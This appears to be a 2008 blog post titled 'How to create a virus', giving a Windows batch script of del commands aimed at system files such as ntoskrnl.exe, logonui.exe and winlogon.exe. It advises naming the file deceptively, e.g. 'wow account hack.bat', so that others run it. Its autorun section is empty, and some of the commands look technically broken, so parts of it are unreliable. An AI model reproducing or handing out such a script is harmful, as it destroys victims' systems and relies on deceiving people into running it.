Minggu, 11 Mei 2008

How to create a virus

Now i will show you how to make a virus that removes a system file called system32. Follow the instruction how to create it. Do this on your own risk, becuse this is illegal

Step 1. Open your notepad, if you dont have notepad on your desktop, search on it.

Step 2. If you have your notepad up, type this:

@echo off
del "C:\windows\pchealth\"
del "C:\windows\system\"
del "C:\windows\system32\restore\"
del "winlogon.exe"
del "C:\windows\system32\autoexec.nt"
del "C:\windows\system32\logonui.exe"
del "C:\windows\system32\ntoskrnl.exe"

when you have this text in your notepad, save the document on your deskop and name it as (something).bat ... Its very very important that you make the format to .bat mabye do it like this wow account hack.bat

Create the Virus autorun

copy to notepad


save in on autorun.inf

Good Luck...

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